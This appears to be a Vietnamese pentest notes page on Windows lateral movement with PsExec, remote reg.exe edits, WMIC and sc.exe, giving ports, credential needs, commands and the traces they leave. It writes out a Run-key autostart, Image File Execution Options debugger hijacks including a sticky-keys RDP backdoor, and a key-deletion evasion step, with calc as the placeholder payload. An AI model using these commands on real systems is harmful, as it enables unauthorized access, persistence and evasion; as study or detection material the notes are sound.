Windows component

psexec.exe

Port

135, 445, 4915x/TCP

Credentials

Cleartext

Cần writable share

Sử dụng cơ bản

PsExec.exe -u doamin\user -p password \\IP -i cmd

Kết quả

Ở máy victim ta sẽ thấy file PSEXESVC được tạo ở ADMIN$ share (lí do vì sao cần writeable share)

Ta sẽ thấy exe này được thực thi qua service để handle remote cmd

Khi exit session thì file PSEXESVC.exe và service PSEXESVC bị xóa

Port

445

Credentials

Cleartext

Không cần

Đầu tiên ta cần chạy runas với creden của victim

runas /user:domain\user cmd

Câu lệnh sẽ spawn cmd mới, ta sẽ remote set reg với cmd mới này

Remote set startup program

reg.exe add \\IP\HKLM\software\microsoft\windows\currentversion\run /v testprog /t REG_SZ /d "calc"

Remote set program launch handler

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t reg_sz /d "calc"

Backdoor in RDP

reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "calc"

Evasion

reg.exe delete \\IP\HKLM\... /v <key_nhame> /f

Port

135, 4915x/TCP

Credentials

Cleartext

Không cần

Sử dụng cơ bản

wmic.exe /user:domain\user /password:password /node:IP process call create 'calc'

Tại log Sysmon ta sẽ thấy calc.exe được spawn bởi WmiPrvSE.exe

Port

135, 4915x/TCP

Credentials

Cleartext

Không cần

Sử dụng cơ bản

sc.exe \\IP create serviceName binPath= "cmd /c calc" start= auto
sc.exe \\IP start serviceName

Tạo service từ xa và kích hoạt để thực thi cmd. Tại victim ta sẽ thấy logs tạo service

Last updated 9 months ago